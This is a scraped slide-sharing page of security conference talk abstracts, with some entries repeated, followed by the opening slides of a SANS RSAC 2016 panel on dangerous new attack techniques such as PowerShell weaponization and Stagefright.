Which are the most dangerous new attack techniques for 2016/2017? How do they work? How can you stop them? What's coming next and how can you prepare? This fast-paced session provides answers from the three people best positioned know: the head of the Internet Storm Center, the top hacker exploits expert/teacher in the U.S., and the top expert on cyberattacks on industrial control systems.
(Source: RSA USA 2016-San Francisco)
An advanced piece of malware, known as ‘Regin’, has been used in systematic spying campaigns against a range of international targets including government agencies and businesses since at least 2008 vide IT security firms Symantec and Kaspersky Lab reports both released on 24th Nov 2014.This ppt brings you an overview of the threat in brief.The piece of malware is unique in the sense that it's structure displays a degree of technical competence rarely seen.Stuxnet looks a decent past....with this complexity
This ppresentation brings out a brief over view of WireLurker,the first of a kind of malware family that has made the Apple to rot...never in the history of unquestionable iOS/Mac devices has such a thing been seen or heard...with such a severe beating...the ppt is based on a report made recently public by Palo Alto Networks®...
STAAF, An Efficient Distributed Framework for Performing Large-Scale Android ...Praetorian
There has been no shortage of Android malware analysis reports recently, but thus far that trend has not been accompanied with an equivalent scale of released public Android application tools or frameworks. To address this issue, we are presenting the Scalable Tailored Application Analysis Framework (STAAF), released as a new OWASP project for public use under Apache License 2.0. The goal of this framework is to allow a team of one or more analysts to efficiently analyze a large number of Android applications. In addition to large scale analysis, the framework aims to promote collaborative analysis through shared processing and results.
Our framework is designed using a modular and distributed approach, which allows each processing node to be highly tailored for a particular task. At the heart of the framework is the Resource Manager (RM) module, which is responsible for tracking samples, managing analysis modules, and storing results. The RM also serves to reduce processing time and data management through the deduplication of data and work, and it also aids with the scheduling of tasks so that they can be completed as a pipeline or as a single unit. When processing begins, the RM uses several default "primitive" modules that carry out the fundamental operations, such as extracting the manifest, transforming the Dalvik bytecode, and extracting application resources. The analysis modules then use the raw results to extract specific attributes such as permissions, receivers, invoked methods, external resources accessed, control flow graphs, etc., and these results are then stored in a distributed data store, after which the information can be queried for high level trends or targeted searches.
The modular nature of our framework allows independent analyses to happen on a per module basis, and the results of this data processing can be merged with other results at a later time. This design promotes an agile approach to large scale analysis, because it permits a wide array of analysis to happen distributively and in parallel. This means that teams with different needs or schedules can complete time-sensitive tasks separately with minimized data processing pipelines, while allowing more complex or time intensive tasks to be added later. Additionally, if analysis needs to be branched at some point in the pipeline, intermediate results can be retained and additional modules can be added leveraging the results from the past analysis steps. The results are also stored in a distributed database and designed to be queried using a map-reduce style query, which offers performance efficiencies as well as allowing the transparent inclusion of remote third party analysis databases. By using this plug-in style analysis framework, we are able to attain more efficient processing schedules and tailor the analysis for a specific need.
This framework is designed to be scalable and extensible, and the initial offering of this framework includes several modules...
Kaspersky Lab’s Webinar ‘Emerging Threats in the APT World: Predictions for 2...Kaspersky
For several years now, Kaspersky Lab’s Global Research and Analysis Team (GReAT) has been monitoring more than 60 threat actors responsible for cyber-attacks worldwide. By closely observing these organizations, which appear to be fluent in many languages, including Russian, Chinese, German, Spanish, Arabic and Persian, we have put together a list of what seem to be the emerging threats in the APT world. We think these will play an important role in 2015 and deserve special attention. As a participant of the webinar, you will be the first to hear our detailed analysis of the trends.
The webinar was hosted by Costin Raiu, Director of GReAT at Kaspersky Lab, on December 11.
“If we can call 2014‘sophisticated’, then the word for 2015 will be ‘elusive’. We believe that APT groups will evolve to become stealthier and sneakier, in order to better avoid exposure. This year we’ve already discovered APT players using several zero-days, and we’ve observed new persistence and stealth techniques. We have used this to develop and deploy several new defense mechanisms for our users,” comments Costin Raiu.
Listen to the presentation https://kas.pr/aptwebinar
Read the full report https://kas.pr/ksb
An advanced piece of malware, known as ‘Regin’, has been used in systematic spying campaigns against a range of international targets including government agencies and businesses since at least 2008 vide IT security firms Symantec and Kaspersky Lab reports both released on 24th Nov 2014.This ppt brings you an overview of the threat in brief.The piece of malware is unique in the sense that it's structure displays a degree of technical competence rarely seen.Stuxnet looks a decent past....with this complexity
This ppresentation brings out a brief over view of WireLurker,the first of a kind of malware family that has made the Apple to rot...never in the history of unquestionable iOS/Mac devices has such a thing been seen or heard...with such a severe beating...the ppt is based on a report made recently public by Palo Alto Networks®...
STAAF, An Efficient Distributed Framework for Performing Large-Scale Android ...Praetorian
There has been no shortage of Android malware analysis reports recently, but thus far that trend has not been accompanied with an equivalent scale of released public Android application tools or frameworks. To address this issue, we are presenting the Scalable Tailored Application Analysis Framework (STAAF), released as a new OWASP project for public use under Apache License 2.0. The goal of this framework is to allow a team of one or more analysts to efficiently analyze a large number of Android applications. In addition to large scale analysis, the framework aims to promote collaborative analysis through shared processing and results.
Our framework is designed using a modular and distributed approach, which allows each processing node to be highly tailored for a particular task. At the heart of the framework is the Resource Manager (RM) module, which is responsible for tracking samples, managing analysis modules, and storing results. The RM also serves to reduce processing time and data management through the deduplication of data and work, and it also aids with the scheduling of tasks so that they can be completed as a pipeline or as a single unit. When processing begins, the RM uses several default "primitive" modules that carry out the fundamental operations, such as extracting the manifest, transforming the Dalvik bytecode, and extracting application resources. The analysis modules then use the raw results to extract specific attributes such as permissions, receivers, invoked methods, external resources accessed, control flow graphs, etc., and these results are then stored in a distributed data store, after which the information can be queried for high level trends or targeted searches.
The modular nature of our framework allows independent analyses to happen on a per module basis, and the results of this data processing can be merged with other results at a later time. This design promotes an agile approach to large scale analysis, because it permits a wide array of analysis to happen distributively and in parallel. This means that teams with different needs or schedules can complete time-sensitive tasks separately with minimized data processing pipelines, while allowing more complex or time intensive tasks to be added later. Additionally, if analysis needs to be branched at some point in the pipeline, intermediate results can be retained and additional modules can be added leveraging the results from the past analysis steps. The results are also stored in a distributed database and designed to be queried using a map-reduce style query, which offers performance efficiencies as well as allowing the transparent inclusion of remote third party analysis databases. By using this plug-in style analysis framework, we are able to attain more efficient processing schedules and tailor the analysis for a specific need.
This framework is designed to be scalable and extensible, and the initial offering of this framework includes several modules...
Kaspersky Lab’s Webinar ‘Emerging Threats in the APT World: Predictions for 2...Kaspersky
For several years now, Kaspersky Lab’s Global Research and Analysis Team (GReAT) has been monitoring more than 60 threat actors responsible for cyber-attacks worldwide. By closely observing these organizations, which appear to be fluent in many languages, including Russian, Chinese, German, Spanish, Arabic and Persian, we have put together a list of what seem to be the emerging threats in the APT world. We think these will play an important role in 2015 and deserve special attention. As a participant of the webinar, you will be the first to hear our detailed analysis of the trends.
The webinar was hosted by Costin Raiu, Director of GReAT at Kaspersky Lab, on December 11.
“If we can call 2014‘sophisticated’, then the word for 2015 will be ‘elusive’. We believe that APT groups will evolve to become stealthier and sneakier, in order to better avoid exposure. This year we’ve already discovered APT players using several zero-days, and we’ve observed new persistence and stealth techniques. We have used this to develop and deploy several new defense mechanisms for our users,” comments Costin Raiu.
Listen to the presentation https://kas.pr/aptwebinar
Read the full report https://kas.pr/ksb
Top 9 Critical Findings - Dramatically Improve Your Organization's SecurityPraetorian
As an information security consulting company, Praetorian has a unique ability to observe security programs across a wide range of companies. Based on the vulnerability patterns seen across organizations, a top ten list of common critical findings was created. The purpose of this presentation is to examine each of those critical findings and provide recommendations for mitigation. Examples from actual engagements are used to emphasize risk through real world scenarios. Some information from the screenshots provided has been redacted to protect confidentiality.
Praetorian's goal is to help our clients understand minimize their overall security exposure and liability. Through our services, your organization can obtain an accurate, independent security assessment.
We at Kaspersky Lab believe that the online world should be free from attacks and state-sponsored espionage. And we've been standing by this belief for over 20 years, catching all kinds of cyberthreats, regardless of their origin.
Learn more about our principles of fighting cyberthreats and transparency from this brochure or on our web-site: https://www.kaspersky.com/about/transparency
Exploring Risk and Mapping the Internet of Things with Autonomous DronesPraetorian
Recently featured in Fortune Magazine, Praetorian’s Internet of Things Map Project gave the public a glimpse into potential risk associated with thousands of exposed Internet of Things devices it revealed. Paul Jauregui, Vice President of Praetorian, will share his experience leading the Internet of Things Mapping Project. In this session you will learn how Praetorian security engineers developed and outfitted an autonomous drone with custom ZigBee-sniffing hardware used to discover, fingerprint, and map several thousand Internet of Things devices in Austin, TX. The talk will also explore best practices and recommendations designed to help product teams avoid common Internet of Things embedded device security issues. This unique and entertaining session will engage the audience’s curiosity about emerging Internet of Things issues and showcase innovative approaches to exploring the Internet of Things landscape.
Presentación del fundador y CTO de Palo Alto Networks, Nir Zuk, sobre las amenazas de seguridad actuales, como ha evolucionado el ciberterrorismo, y las formas de controlarlo con el FW de Nueva Generación de Palo Alto Networks.
Open Source has the potential to deliver faster development cycles and better security than traditional proprietary approaches to software. However, turning the potential of Open Source into reality can be difficult. Recent security issues like Heartbleed, Shellshock and the Panama Papers highlighted some of the challenges users of Open Source can face. This talk will explore how we can address them.
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.Stefano Maccaglia
The deck covers details about the Sunburst/Solorigate breach including some interesting threat intel paths we are currently evaluating to attribute the attack.
RSAC 2021 Spelunking Through the Steps of a Control System HackDan Gunter
Ever wonder what a hack on an industrial process using real-world Tactics Techniques and Procedures (TTP) really looks like? This session will demonstrate an attack step by step from the initial discovery, to the physical impact to reducing the chance of the attack in the first place.
7 Reasons Your Applications are Attractive to AdversariesDerek E. Weeks
Presentation from 18 November 2014.
Software applications need to be delivered faster and across more platforms than ever. To build high quality software in short order, we’ve seen a dramatic shift from source code to component-based development, with open source and third party components providing the innovation and efficiency that developers need.
Unfortunately, our dependence on components is growing faster than our ability to secure them. These shared components are not top-of-mind when considering application risk. Worse yet, components are increasingly the preferred attack surface in today’s applications.
The combination of growing component usage, coupled with lack of security, requires us to urgently re-evaluate traditional application security approaches and identify practical next steps for closing this security gap.
So what’s the “neglected 90%,” why is it attractive to your adversaries and what can you do about it? Plenty. Here are 7 key points, for starters.
http://bit.ly/AHC_USAF
Watch the webinar recording: http://hubs.ly/y0XwTS0
In this RSA Conference webcast, security experts Adi Sharabani and Yair Amit describe the current threat landscape for mobile devices and discuss security strategies.
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7Rapid7
The Internet of Fails - Where IoT (the Internet of Things) has gone wrong and how we’re making it right. By Mark Stanislav @mstanislav, Senior Security Consultant, Rapid7
Upwardly Mobile: Looking at Evolving Cybercrime Tactics in Mobile MalwarePriyanka Aash
This session will cover two key trends in mobile malware observed over the past 12 months and explore the evolution in fraud-linked mobile malware where criminals are developing credential theft tools that attempt to duplicate the successes of Windows malware in modifying victim interactions with targeted services. Also a look at mobile ransomware variants becoming more numerous and damaging.
(Source: RSA USA 2016-San Francisco)
Secure application deployment in Apache CloudStackTim Mackey
At the Apache CloudStack Collaboration Conference in Montreal, I presented a potential pathway to secure template management in CloudStack. Under this model, cloud providers can assess the templates their users have and potentially advise if deployed instances have application security issues which have either public disclosures, or better still remediation.
Empowering Application Security Protection in the World of DevOpsIBM Security
Watch on-demand now: https://securityintelligence.com/events/application-security-protection-world-of-devops/
How do organizations build secure applications, given today's rapidly moving and evolving DevOps practices? Development teams are aware of the shifting security challenges they face. However, they're by no means security experts, nor do they have spare time on their hands to learn new tools.
What can development teams do to keep pace with rapidly-evolving application security threats?
The answer lies in automation. By making application security part of the continuous build processes, organizations can protect against these major risks.
In this session, you will learn:
- New security challenges facing today’s popular DevOps and Continuous Integration (CI) practices, including managing custom code and open source risks with containers and traditional environments.
- Best practices for designing and incorporating an automated approach to application security into your existing development environment.
- Future development and application security challenges organizations will face and what they can do to prepare.
Windows attacks receive all the attention. However, Mac and Linux have gained in popularity with the adversary. This session will focus on common Mac attack vectors and other cross-platform hacks that are typically seen in enterprise intrusions. We will also cover practical counter measures to make these alternate platforms more resilient.
(Source: RSA USA 2016-San Francisco)
Windows attacks receive all the attention. However, Mac and Linux have gained in popularity with the adversary. This session will focus on common Mac attack vectors and other cross-platform hacks that are typically seen in enterprise intrusions. We will also cover practical counter measures to make these alternate platforms more resilient.
(Source: RSA USA 2016-San Francisco)
Top 9 Critical Findings - Dramatically Improve Your Organization's SecurityPraetorian
As an information security consulting company, Praetorian has a unique ability to observe security programs across a wide range of companies. Based on the vulnerability patterns seen across organizations, a top ten list of common critical findings was created. The purpose of this presentation is to examine each of those critical findings and provide recommendations for mitigation. Examples from actual engagements are used to emphasize risk through real world scenarios. Some information from the screenshots provided has been redacted to protect confidentiality.
Praetorian's goal is to help our clients understand minimize their overall security exposure and liability. Through our services, your organization can obtain an accurate, independent security assessment.
We at Kaspersky Lab believe that the online world should be free from attacks and state-sponsored espionage. And we've been standing by this belief for over 20 years, catching all kinds of cyberthreats, regardless of their origin.
Learn more about our principles of fighting cyberthreats and transparency from this brochure or on our web-site: https://www.kaspersky.com/about/transparency
Exploring Risk and Mapping the Internet of Things with Autonomous DronesPraetorian
Recently featured in Fortune Magazine, Praetorian’s Internet of Things Map Project gave the public a glimpse into potential risk associated with thousands of exposed Internet of Things devices it revealed. Paul Jauregui, Vice President of Praetorian, will share his experience leading the Internet of Things Mapping Project. In this session you will learn how Praetorian security engineers developed and outfitted an autonomous drone with custom ZigBee-sniffing hardware used to discover, fingerprint, and map several thousand Internet of Things devices in Austin, TX. The talk will also explore best practices and recommendations designed to help product teams avoid common Internet of Things embedded device security issues. This unique and entertaining session will engage the audience’s curiosity about emerging Internet of Things issues and showcase innovative approaches to exploring the Internet of Things landscape.
Presentación del fundador y CTO de Palo Alto Networks, Nir Zuk, sobre las amenazas de seguridad actuales, como ha evolucionado el ciberterrorismo, y las formas de controlarlo con el FW de Nueva Generación de Palo Alto Networks.
Open Source has the potential to deliver faster development cycles and better security than traditional proprietary approaches to software. However, turning the potential of Open Source into reality can be difficult. Recent security issues like Heartbleed, Shellshock and the Panama Papers highlighted some of the challenges users of Open Source can face. This talk will explore how we can address them.
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.Stefano Maccaglia
The deck covers details about the Sunburst/Solorigate breach including some interesting threat intel paths we are currently evaluating to attribute the attack.
RSAC 2021 Spelunking Through the Steps of a Control System HackDan Gunter
Ever wonder what a hack on an industrial process using real-world Tactics Techniques and Procedures (TTP) really looks like? This session will demonstrate an attack step by step from the initial discovery, to the physical impact to reducing the chance of the attack in the first place.
7 Reasons Your Applications are Attractive to AdversariesDerek E. Weeks
Presentation from 18 November 2014.
Software applications need to be delivered faster and across more platforms than ever. To build high quality software in short order, we’ve seen a dramatic shift from source code to component-based development, with open source and third party components providing the innovation and efficiency that developers need.
Unfortunately, our dependence on components is growing faster than our ability to secure them. These shared components are not top-of-mind when considering application risk. Worse yet, components are increasingly the preferred attack surface in today’s applications.
The combination of growing component usage, coupled with lack of security, requires us to urgently re-evaluate traditional application security approaches and identify practical next steps for closing this security gap.
So what’s the “neglected 90%,” why is it attractive to your adversaries and what can you do about it? Plenty. Here are 7 key points, for starters.
http://bit.ly/AHC_USAF
Watch the webinar recording: http://hubs.ly/y0XwTS0
In this RSA Conference webcast, security experts Adi Sharabani and Yair Amit describe the current threat landscape for mobile devices and discuss security strategies.
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7Rapid7
The Internet of Fails - Where IoT (the Internet of Things) has gone wrong and how we’re making it right. By Mark Stanislav @mstanislav, Senior Security Consultant, Rapid7
Upwardly Mobile: Looking at Evolving Cybercrime Tactics in Mobile MalwarePriyanka Aash
This session will cover two key trends in mobile malware observed over the past 12 months and explore the evolution in fraud-linked mobile malware where criminals are developing credential theft tools that attempt to duplicate the successes of Windows malware in modifying victim interactions with targeted services. Also a look at mobile ransomware variants becoming more numerous and damaging.
(Source: RSA USA 2016-San Francisco)
Secure application deployment in Apache CloudStackTim Mackey
At the Apache CloudStack Collaboration Conference in Montreal, I presented a potential pathway to secure template management in CloudStack. Under this model, cloud providers can assess the templates their users have and potentially advise if deployed instances have application security issues which have either public disclosures, or better still remediation.
Empowering Application Security Protection in the World of DevOpsIBM Security
Watch on-demand now: https://securityintelligence.com/events/application-security-protection-world-of-devops/
How do organizations build secure applications, given today's rapidly moving and evolving DevOps practices? Development teams are aware of the shifting security challenges they face. However, they're by no means security experts, nor do they have spare time on their hands to learn new tools.
What can development teams do to keep pace with rapidly-evolving application security threats?
The answer lies in automation. By making application security part of the continuous build processes, organizations can protect against these major risks.
In this session, you will learn:
- New security challenges facing today’s popular DevOps and Continuous Integration (CI) practices, including managing custom code and open source risks with containers and traditional environments.
- Best practices for designing and incorporating an automated approach to application security into your existing development environment.
- Future development and application security challenges organizations will face and what they can do to prepare.
Windows attacks receive all the attention. However, Mac and Linux have gained in popularity with the adversary. This session will focus on common Mac attack vectors and other cross-platform hacks that are typically seen in enterprise intrusions. We will also cover practical counter measures to make these alternate platforms more resilient.
(Source: RSA USA 2016-San Francisco)
Windows attacks receive all the attention. However, Mac and Linux have gained in popularity with the adversary. This session will focus on common Mac attack vectors and other cross-platform hacks that are typically seen in enterprise intrusions. We will also cover practical counter measures to make these alternate platforms more resilient.
(Source: RSA USA 2016-San Francisco)
As the industry’s first Secure Internet Gateway in the cloud, Cisco Umbrella provides the first line of defense against threats on the internet, protecting all your users within minutes.
Cisco Advanced Malware Protection offers global threat intelligence, advanced sandboxing and real-time malware blocking to prevent breaches while it continuously analyzes file activity across your network, so that you can quickly detect, contain and remove advanced malware.
Presentation of Cisco Security Architecture and Solutions such as Cisco Advanced Malware Protection (AMP) and Cisco Umbrella during Simplex-Cisco Technology Session that took place at the Londa Hotel in Limassol on 14 March 2018.
The Hacking Games - Operation System Vulnerabilities Meetup 29112022lior mazor
Our technology, work processes, and activities all are depend based on Operation Systems to be safe and secure. Join us virtually for our upcoming "The Hacking Games - Operation System Vulnerabilities" Meetup to learn how hacker can compromise Operation System, bypass AntiVirus protection layer and exploiting Linux eBPF.
As seen with the IoT-based MIRAI botnet, security vulnerabilities can have their root cause several layers down in the supply chain. The session will corroborate this with concrete vulnerability results of over 5,000 IoT software packages. It also will show how, to stop this bug passing, developers, integrators and regulating bodies need to work together to build a trustworthy IoT software supply chain.
Cyber Hacking & Security - IEEE - Univ of Houston 2015-04Kyle Lai
What is CyberSecurity? Who are the threats? Why is cyber attack happening? How bad is it? How do attackers do it? What can we learn from Star Wars?
This presentations Cyber Attacks, State of CyberSecurity, some guidance for the students interested in getting into the field, and some great resources.
Intelligence-Driven Industrial Security with Case Studies in ICS Attacks Dragos, Inc.
Robert M. Lee's, Dragos CEO, presentation from RSA 2019.
Description: Most industrial security best practices are essentially enterprise security best practices copy/pasted into industrial networks. Yet that is not an effective way to reduce risk against industrial-specific threats. Instead, we can learn from ICS attacks that have occurred. In this presentation, Robert M, Lee, CEO and co-founder of Dragos will provide first-hand insights into industrial threats and the lessons learned for industrial security.
More information here: https://dragos.com/rsa-2019/
More info: www.dragos.com
Follow us on LinkedIn: https://www.linkedin.com/company/drag....
Follow us on Twitter: https://twitter.com/dragosinc
There are different types of attacks that expose enterprise data. An application can be attacked at various layers, on different hardware, and with very different goals in mind, creating a very complex problem for companies who want to protect their intellectual property.
Attacks on Critical Infrastructure: Insights from the “Big Board”Priyanka Aash
Targeted attacks on critical infrastructure continue to increase in number and severity. We’ll present the latest data on these attacks: What is their goal? What are the attacker strategies? How are attacks supported by the darknet? We’ll discuss banking threats discovered at the “Big Board” at the RSA Anti-Fraud Control Center and Smart Grid threat detection in the EU SPARKS project.
(Source: RSA USA 2016-San Francisco)
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
Key Discussion Pointers:
1. Introduction to Data Privacy
- What is data privacy
- Privacy laws around the globe
- DPDPA Journey
2. Understanding the New Indian DPDPA 2023
- Objectives
- Principles of DPDPA
- Applicability
- Rights & Duties of Individuals
- Principals
- Legal implications/penalties
3. A practical approach to DPDPA compliance
- Personal data Inventory
- DPIA
- Risk treatment
It covers popular IaaS/PaaS attack vectors, list them, and map to other relevant projects such as STRIDE & MITRE. Security professionals can better understand what are the common attack vectors that are utilized in attacks, examples for previous events, and where they should focus their controls and security efforts.
Discuss Security Incidents & Business Use Case, Understanding Web 3 Pros
and Web 3 Cons. Prevention mechanism and how to make sure that it doesn’t happen to you?
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
Round Table Discussion On "Emerging New Threats And Top CISO Priorities In 2022"_ Bangalore
Date - 28 September, 2022. Decision Makers of different organizations joined this discussion and spoke on New Threats & Top CISO Priorities
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
Cloud Security Groups are the firewalls of the cloud. They are built-in and provide basic access control functionality as part of the shared responsibility model. However, Cloud Security Groups do not provide the same protection or functionality that enterprises have come to expect with on-premises deployments. In this talk we will discuss the top cloud risks in 2020, why perimeters are a concept of the past and how in the world of no perimitiers do Cloud Security groups, the "Cloud FIrewalls", fit it. We will practically explore Cloud Security Group limitations across different cloud setups from a single vNet to multi-cloud
Most organizations have good enterprise-level security policies that define their approach to maintaining, improving, and securing their information and information systems. However, once the policies are signed by senior leadership and distributed throughout the organization, significant cybersecurity governance challenges remain. In this workshop I will explain the transforming organizational security to strengthen defenses and integrate cybersecurity with the overall approach toward security governance, risk management and compliance.
The Internet is home to seemingly infinite amounts of confidential and personal information. As a result of this mass storage of information, the system needs to be constantly updated and enforced to prevent hackers from retrieving such valuable and sensitive data. This increasing number of cyber-attacks has led to an increasing importance of Ethical Hacking. So Ethical hackers' job is to scan vulnerabilities and to find potential threats on a computer or networks. An ethical hacker finds the weakness or loopholes in a computer, web applications or network and reports them to the organization. It requires a thorough knowledge of Networks, web servers, computer viruses, SQL (Structured Query Language), cryptography, penetration testing, Attacks etc. In this session, you will learn all about ethical hacking. You will understand the what ethical hacking, Cyber- attacks, Tools and some hands-on demos. This session will also guide you with the various ethical hacking certifications available today.
"Impact of front-end architecture on development cost", Viktor TurskyiFwdays
I have heard many times that architecture is not important for the front-end. Also, many times I have seen how developers implement features on the front-end just following the standard rules for a framework and think that this is enough to successfully launch the project, and then the project fails. How to prevent this and what approach to choose? I have launched dozens of complex projects and during the talk we will analyze which approaches have worked for me and which have not.
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
1. PANELISTS:
SESSION ID:
#RSAC
MODERATOR:
EXP-T09R
Dr. Johannes Ullrich
Dean of Research at STI - SANS’ Graduate
School
Director of the Internet Storm Center
Michael Assante
Director of SANS ICS Training Programs
Was VP and CISO of NERC
Directed INL’s Electric Power Program
Testified before US House and Senate
Ed Skoudis
Leads SANS Pen Testing and Hacker
Exploits Immersion Training Programs
Created NetWars & CyberCity Simulators
Author of CounterHack Reloaded
Alan Paller
Director of Research, SANS Institute
The Seven Most Dangerous New
Attack Techniques,
and What's Coming Next
2. #RSAC
Ed Skoudis
-- Leads SANS Pen Testing and Hacker Exploits Immersion Training Programs
-- Created NetWars & CyberCity Simulators
-- Author of Counter Hack Reloaded
3. #RSAC
Top Threats - Skoudis
3
Broadening Targets
Full Weaponization of Windows PowerShell
What Stagefright Tells Us About Mobile Security Going Forward
XcodeGhost – How Will You Trust Your Apps Going Forward?
4. #RSAC
Broadening Targets
4
The last 12 months have shown the threat’s focus is broadening
PII still a target, but much more is in play now
OPM attack
Government background check data and fingerprints
Ashley Madison attack
Sensitive personal information at play
Extortion malware stealing browser history
Ukrainian power grid attack
5. #RSAC
Defenses Against Broadening Threats
5
Don’t assume that you are safe just because you lack PII
Attackers are devising clever uses for all kinds of data with
criminal and national security implications
Vigorously apply robust security standards focused on actual
attack techniques used in the wild
Twenty Critical Controls
IAD Top 10 Information Assurance Mitigation Strategies
Australian Signals Directorate Top 4 Mitigation Strategies
6. #RSAC
Windows PowerShell Weaponization
6
PowerShell Empire – Amazing integrated post-exploitation capabilities
By Will Schroeder, Justin Warner, and more
PowerShell Empire features:
Powerful agent
Pillaging / Privilege escalation
Pivoting / Lateral movement
